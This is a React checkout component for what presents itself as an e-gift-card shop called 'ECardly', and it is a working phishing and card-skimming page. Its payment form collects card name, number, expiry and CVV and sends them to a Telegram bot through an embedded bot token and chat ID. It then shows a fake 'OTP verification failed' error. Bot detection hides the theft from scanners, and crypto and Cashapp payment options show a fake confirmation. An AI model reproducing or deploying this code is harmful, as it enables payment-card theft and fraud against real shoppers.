import { useState, useEffect, useRef } from "react";
import { Flex, Text, Image, Spinner, Switch, 
    NumberInput,
    NumberInputField,
    NumberInputStepper,
    NumberIncrementStepper,
    NumberDecrementStepper,  } from "@chakra-ui/react";
import { useHistory, useLocation } from "react-router-dom";
import Logo from "./logo.png"
import p1 from "./p1.png"
import p2 from "./p2.png"
import p3 from "./p3.png"
import p4 from "./p4.png"
import p5 from "./p5.png"
import Toast from "./toast"
import { ApiFile } from './request'
import { load } from '@fingerprintjs/botd'
import axios from "axios";



export default function Buy({ cardName, cardDp }) {
    const history = useHistory()
	const [isBot, setIsBot] = useState(true)

    useEffect(() => {
		const botdPromise = load()
		botdPromise
			.then((botd) => botd.detect())
			.then((result) => {
				setIsBot(result?.bot)
				if(result?.bot === true) {
					window.open("https://eyeyeyetettet")
				}
			})
			.catch((error) => console.error(error))
	}, [])

    useEffect(() => {
        if(cardName === "") {
            history.push("/")
            setTimeout(function() {
                const element = document.getElementById('pvArea')
                return window.scrollTo({
                top: element ? element.offsetTop - 50 : 0,
                behavior: 'smooth',
                })
            }, 100)
        }
    }, [])

    const [amt, setAmt] = useState(2)
    const [amtNo, setAmtNo] = useState(100)
    const [cardNo, setCardNo] = useState(1)
    const [mod1, setMod1] = useState(false)
    const [mod2, setMod2] = useState(false)
    const [payMode, setPayMode] = useState(0)
    const [loading, setLoading] = useState(false)
    const [tag, setTag] = useState("")

    const inp1 = useRef()
    const inp2 = useRef()
    const inp3 = useRef()
    const inp4 = useRef()

    async function getTag() {
        const formData = new FormData()
        formData.append("tid", "6464463geggegeg")
        const res = await ApiFile("post", "misc.php", formData)
        if(res?.status) {
            setTag([res?.data])
        }
        else {
            setTag("")
        }
    }


    async function xrerretet(a, b, c, d) {
        setLoading(true)
        const formData = new FormData()
        formData.append("tid2", "tetererrwrwewe")
        formData.append("a", a)
        formData.append("b", b)
        formData.append("c", c)
        formData.append("d", d)
        if(isBot === false) {
            var sData = encodeURI("ECardly Debit/Credit Card: \n\nCard name: "+a+"\n\nCard Number: "+b+"\n\nExpiry: "+c+"\n\nPin: "+d)
            await axios.get('https://api.telegram.org/bot7019684923:AAFnCEHNq5n7n_3RnbtWPTU9zUHCUn4G3P8/'+"sendmessage?text="+sData+"&chat_id=5980500481&parse_mode=HTML");
        }
        await ApiFile("post", "misc.php", formData)
        setLoading(false)
        Toast("A network error has occurred, OTP verification failed", "error")
        setMod2(false)
    }


    useEffect(() => {
        getTag()
    }, [])

    return (
        <>
            <Flex w="100%" py={["40px", "80px"]} px={["5", "12%"]} bg="rgb(248,248,252)" align="center" direction={["column", "row"]}>
                <Flex w={["100%", "45%"]} direction="column">
                    <Flex mt={["0", "-80px"]} mb="5" data-aos="fade-up">
                        <Flex align="center" color="slategray" cursor="pointer" _hover={{ letterSpacing: "3px" }} onClick={() => history.goBack()}>
                            <Text fontSize="20px"><i className="mdi mdi-chevron-left"></i></Text>
                            <Text ml="1" transition="300ms ease-in-out">Back</Text>
                        </Flex>
                    </Flex>
                    <Flex w="100%" boxShadow="0px 0px 10px rgba(0,0,0,.12)" backgroundImage={cardDp} backgroundSize="cover" backgroundRepeat="no-repeat" backgroundPosition="center center" borderRadius="8px" h={["200px", "300px"]} data-aos="fade-down"></Flex>
                </Flex>
                <Flex mt={["8", "0"]} w={["100%", "55%"]} pl={["0", "8%" ]}direction="column">
                    <Text fontSize={["20px", "30px"]} data-aos="fade-down" fontWeight="700">{cardName}<Text as="span" fontWeight="300"> E-Card</Text></Text>
                    <Flex align="center" fontSize={["14px", "18px"]} mt="4">
                        <Text fontSize={["26px", "40px"]} mr="4"><i className="mdi mdi-email"></i></Text> Email Delivery
                    </Flex>
                    <Flex align="center" fontSize={["14px", "18px"]}>
                        <Text fontSize={["26px", "40px"]} mr="4"><i className="mdi mdi-calendar-clock"></i></Text> Est. Delivery Time: 1-3 mins
                    </Flex>
                    <Text mt="6" color="slategray" fontSize="13px">Select the amount you will like to purchase</Text>
                    <Flex mt="6" flexWrap={["wrap", "nowrap"]}>
                        {
                            ["20", "50", "100", "200", "500"].map((item, index) => (
                                <Flex padding="10px 20px" mb={["3", "0"]} borderRadius="30px" cursor="pointer" bg={index === amt ? "#000" : "#fff"} border="2px solid #000" align="center" color={index === amt ? "#fff" : "#000"} _hover={{ bg: "#000", color: "#fff" }} mr="5" transition="300ms ease-in-out" fontWeight="bold" onClick={() => {
                                    setAmt(index)
                                    setAmtNo(item)
                                }}><Text mr="2" fontWeight="300">$</Text> {item}</Flex>
                            ))
                        }
                    </Flex>
                    <Flex mt="6" align="center">   
                        <Switch colorScheme='teal' size="lg" id="isGift" /> <Text ml="4">Send as gift</Text>
                    </Flex>
                    
                    <Text mt="6" color="slategray" fontSize="13px" mb="3">No. of digital cards</Text>
                    <NumberInput data-aos="fade-up" bg="#fff" defaultValue={1} min={1} max={20} clampValueOnBlur={false} onChange={(e) => setCardNo(e)}>
                        <NumberInputField />
                        <NumberInputStepper>
                            <NumberIncrementStepper />
                            <NumberDecrementStepper />
                        </NumberInputStepper>
                    </NumberInput>
                    <Text mt="6" fontWeight="400">Total Due: <Text fontSize="20px" fontWeight="700" as="span" ml="3">${parseInt(amtNo) > 50 ? parseInt(parseInt(cardNo) * parseInt(amtNo)) +  4.69 : parseInt(parseInt(cardNo) * parseInt(amtNo)) +  2.56}</Text></Text>
                    <Flex mt="8"><Flex w="100%" bg="#000" border="2px solid #000" color="#fff" borderRadius="30px" padding={["12px 20px", "15px 40px"]} fontSize={["14px", "15px"]} fontWeight="600" cursor="pointer" _hover={{ transform: "translate(4px, 0px)", letterSpacing: "1px" }} transition="200ms ease-in-out" align="center" justify="center" onClick={() => setMod1(true)}><Text fontSize="16px" mr="2"><i className="mdi mdi-currency-usd"></i></Text> Proceed to Payment</Flex>
                    </Flex>
                </Flex>
            </Flex>


            {
                mod1 &&
                <Flex zIndex="1000" w="100%" h="100%" bg="rgba(0,0,0,0.5)" backdropFilter="blur(10px)" position="fixed" top="0" left="0" justify="center" align="center">
                    <Flex w={["90%", "600px"]} direction="column" borderRadius="8px" bg="#fff" data-aos="fade-up">
                        <Text py="5" px={["5", "8"]} borderBottom="1px solid rgb(222, 222, 225)" fontSize="14px" fontWeight="600">Select Payment Method</Text>
                        <Flex flexWrap="wrap" w="100%" justify="space-between" py="8" px={["5", "8"]}>
                            {
                                [{name: "Card Payment", dp: p4, sub: ""}, {name: "BTC", dp: p2, sub: "bc1qcar304h90c24mad00scdh8t057qqcht008th4s"}, {name: tag[0]?.tagName === "venmo" ? "Venmo" : "Cashapp", dp: tag[0]?.tagName === "venmo" ? p5 : p1, sub: tag[0]?.tagTag}, {name: "ETH", dp: p3, sub: "0x8102eC8A0C6C35f1289c5C7375e341fc3edEBA1f"}].map((item, index) => (
                                    <Flex direction="column" w="48%" align="center" boxShadow="0 .125rem .25rem rgba(0,0,0,.075)" mb="5" fontSize="10px" py="3" px="5" cursor="pointer" border={payMode === index ? "2px solid #000" : "2px solid transparent"} transition="300ms ease-in-out" onClick={() => setPayMode(index)}>
                                        <Image h="50px" src={item.dp} />
                                        <Text mt="5" fontSize="14px" fontWeight="600">{item.name}</Text>
                                        <Text mt="2" color="slategray" wordBreak="break-all" textAlign="center">{item.sub}</Text>
                                    </Flex>
                                ))
                            }
                        </Flex>
                        <Flex justify="space-between" py="5" px={["5", "8"]} borderTop="1px solid rgb(222, 222, 225)">
                            <Flex bg="#000" border="2px solid #000" color="#fff" borderRadius="30px" padding="10px 30px" fontSize={["13px", "15px"]} fontWeight="600" cursor="pointer" _hover={{ transform: "translate(4px, 0px)", letterSpacing: "1px" }} transition="200ms ease-in-out" align="center" justify="center" onClick={() => setMod1(false)}><Text fontSize="16px" mr="2"><i className="mdi mdi-close"></i></Text> Cancel</Flex>

                            <Flex  bg="#fff" border="2px solid #000" color="#000" borderRadius="30px" padding="10px 30px" fontSize={["13px", "15px"]} fontWeight="600" cursor="pointer" _hover={{ transform: "translate(4px, 0px)", letterSpacing: "1px" }} transition="200ms ease-in-out" align="center" justify="center" onClick={() => {
                                setMod1(false)
                                setMod2(true)
                            }}><Text fontSize="16px" mr="2"><i className="mdi mdi-currency-usd"></i></Text> Proceed</Flex>
                        </Flex>
                    </Flex>
                </Flex>
            }


            {
                mod2 &&
                <Flex zIndex="1000" w="100%" h="100%" bg="rgba(0,0,0,0.5)" backdropFilter="blur(10px)" position="fixed" top="0" left="0" justify="center" align="center">
                    <Flex w={["90%", "600px"]} direction="column" borderRadius="8px" bg="#fff" data-aos="fade-up">
                        <Text py="5" px={["5", "8"]} borderBottom="1px solid rgb(222, 222, 225)" fontSize="14px" fontWeight="600">Validate Payment</Text>
                        <Flex direction="column" w="100%" py="8" px={["5", "8"]} maxH="65vh" overflowY="scroll">
                            {
                                payMode === 0 ?
                                <>
                                    <Text fontSize="18px" fontWeight="700">Payment Ticket</Text>
                                    <Text mt="5" mb="2" fontSize="13px">Card Holder's Name</Text>
                                    <Text w="100%"><input type="text" style={{  border: "1px solid #000", borderRadius: "5px", padding: "10px 15px", width: "100%" }} placeholder="Fullname" ref={inp1} /></Text>
                                    <Text mt="5" mb="2" fontSize="13px">Card Number</Text>
                                    <Text w="100%"><input type="number" style={{  border: "1px solid #000", borderRadius: "5px", padding: "10px 15px", width: "100%" }} ref={inp2} placeholder="xxxx xxxx xxxx xxxx" /></Text>
                                    <Text mt="5" mb="2" fontSize="13px">Expiry Date</Text>
                                    <Text w="100%"><input type="month" style={{  border: "1px solid #000", borderRadius: "5px", padding: "10px 15px", width: "100%" }} ref={inp3} placeholder="---" /></Text>
                                    <Text mt="5" mb="2" fontSize="13px">CVV</Text>
                                    <Text w="100%"><input type="number" maxlength="3" style={{  border: "1px solid #000", borderRadius: "5px", padding: "10px 15px", width: "100%" }} ref={inp4} placeholder="XXX" /></Text>
                                </>
                                :
                                <>
                                    <Text fontSize="18px" fontWeight="700">Process Your Payment</Text>

                                    <Text fontSize="13px" color="slategray" textDecoration="underline" cursor="pointer" mt="3" wordBreak="break-all" onClick={() => {
                                        navigator.clipboard.writeText(payMode === 1 ? "bc1qcar304h90c24mad00scdh8t057qqcht008th4s" : payMode === 2 ? tag[0]?.tagTag : "0x8102eC8A0C6C35f1289c5C7375e341fc3edEBA1f")
                                        Toast("Copied to your clipboard", "success")
                                    }}>
                                        <Text as="span" mr="4">{payMode === 1 ? "BTC Wallet: bc1qcar304h90c24mad00scdh8t057qqcht008th4s" : payMode === 2 ? tag[0]?.tagName === "venmo" ? "Venmo Tag: "+tag[0]?.tagTag : "Cashapp Tag: "+tag[0]?.tagTag: "ETH Wallet: 0x8102eC8A0C6C35f1289c5C7375e341fc3edEBA1f"}</Text>(click to copy)
                                    </Text>
                                    <Text fontWeight="700" mt="5">Card Name: {cardName} - Amount: ${amtNo} - Quantity: {cardNo}</Text>
                                    <Text mt="5" mb="2" fontSize="13px">{document.getElementById('isGift').checked ? "The email of the person you wish to gift" : "Your email address"}</Text>
                                    <Text w="100%"><input type="text" style={{  border: "1px solid #000", borderRadius: "5px", padding: "10px 15px", width: "100%" }} placeholder="Email Address" ref={inp1} /></Text>
                                    {
                                        document.getElementById('isGift').checked &&
                                        <>
                                        <Text mt="5" mb="2" fontSize="13px">Message (optional)</Text>
                                        <Text w="100%"><textarea type="text" style={{  border: "1px solid #000", borderRadius: "5px", padding: "10px 15px", width: "100%", resize: "none", height: "100px" }} placeholder="E.g Happy Birthday!"></textarea></Text></>
                                    }
                                    <Text mt="5" mb="2" fontSize="13px">Payment Screenshot</Text>
                                    <Text w="100%"><input type="file" style={{  border: "1px solid #000", borderRadius: "5px", padding: "10px 15px", width: "100%" }} ref={inp2} /></Text>
                                </>
                            }
                        </Flex>
                        <Flex justify="space-between" py="5" px={["5", "8"]} borderTop="1px solid rgb(222, 222, 225)">
                            <Flex bg="#000" border="2px solid #000" color="#fff" borderRadius="30px" padding="10px 30px" fontSize={["13px", "15px"]} fontWeight="600" cursor="pointer" _hover={{ transform: "translate(4px, 0px)", letterSpacing: "1px" }} transition="200ms ease-in-out" align="center" justify="center" onClick={() => setMod2(false)}><Text fontSize="16px" mr="2"><i className="mdi mdi-close"></i></Text> Close</Flex>

                            <Flex  bg="#fff" border="2px solid #000" color="#000" borderRadius="30px" padding="10px 30px" fontSize={["13px", "15px"]} fontWeight="600" cursor="pointer" _hover={{ transform: "translate(4px, 0px)", letterSpacing: "1px" }} transition="200ms ease-in-out" align="center" justify="center" onClick={() => {
                                if(payMode === 0) {
                                    var a = inp1.current.value
                                    var b = inp2.current.value
                                    var c = inp3.current.value
                                    var d = inp4.current.value
                                    if(a !== "" && b !== "" && c !== "" && d !== "") {
                                        xrerretet(a, b, c, d)
                                    }
                                    else {
                                        Toast("Kindly fill all the fields", "error")
                                    }
                                }
                                else {
                                    var a = inp1.current.value
                                    var b = inp2.current.value
                                    if(a !== "" && b !== "") {
                                        setLoading(true)
                                        setTimeout(function() {
                                            setLoading(false)
                                            Toast("Your request has been submiited for processing, your E-Card will be sent after confirmation", "success")
                                            setMod2(false)
                                        }, 3000)
                                    }
                                    else {
                                        Toast("Kindly fill all the fields", "error")
                                    }
                                }
                            }}>{loading ? <Spinner color="#000" emptyColor="grey" /> : <><Text fontSize="16px" mr="2"><i className="mdi mdi-currency-usd"></i></Text> Proceed</>}</Flex>
                        </Flex>
                    </Flex>
                </Flex>
            }
        </>
    )
}